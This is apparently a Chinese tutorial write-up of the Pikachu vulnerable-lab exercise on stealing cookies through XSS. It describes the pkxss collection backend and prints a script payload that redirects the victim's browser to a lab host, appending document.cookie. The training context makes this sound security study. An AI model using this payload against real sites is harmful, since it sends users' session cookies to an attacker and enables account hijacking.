当前位置: 首页 > article >正文

Pikichu-xss实验案例-通过xss获取cookie

原理图:

pikachu提供了一个pkxss后台;

该后台可以把获得的cookie信息显示出来;

查看后端代码cookie.php:就是获取cookie信息,保存起来,然后重定向跳转到目标页面;修改最后从定向的ip,改为自己测试用的IP地址;

对此,构造攻击payload, 获取到cookie ,然后从定向跳转到pkxss后台,pkxss后台把数据保存后,重新重定向回到被攻击的页面。

<script>document.location='http://192.168.3.224:8082/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>
//192.168.3.224  代表pkxss 的后台   document.cookie表示获取被攻击平台的cookie
//拿到cookie后,重定向到pkxss后台把数据保存起来

得到攻击信息。


http://www.kler.cn/news/335665.html

相关文章:

  • 基于Python的人工智能应用案例系列(15):LSTM酒类销售预测
  • CMake构建工程基本要素
  • 文本到语音或视频的构想
  • 什么是数字化智能工厂的组成
  • Microsoft Edge 离线安装包制作或获取方法和下载地址分享
  • 从DBA是“擦车的”谈起
  • 【Linux】用虚拟机配置Ubuntu 24.04.1 LTS环境
  • 社群团购中的用户黏性价值:以开源小程序多商户AI智能名片商城源码为例
  • 科技赋能,商贸物流新速度 —— 智慧供应链商城加速企业成长
  • 【瑞昱RTL8763E】音频
  • 40条经典ChatGPT论文指令,圈定选题和进行论文构思
  • 基于阻塞队列及环形队列的生产消费模型
  • 第一集---初识计算机系统
  • 如何利用免费音频剪辑软件制作出精彩音频
  • 使用ElasticSearch-dump工具进行ES数据迁移、备份
  • python 实现贪婪合并排序算法
  • 【MySQL】-- 库的操作
  • 数据结构--集合框架
  • 【React】事件机制
  • 复习HTML(基础)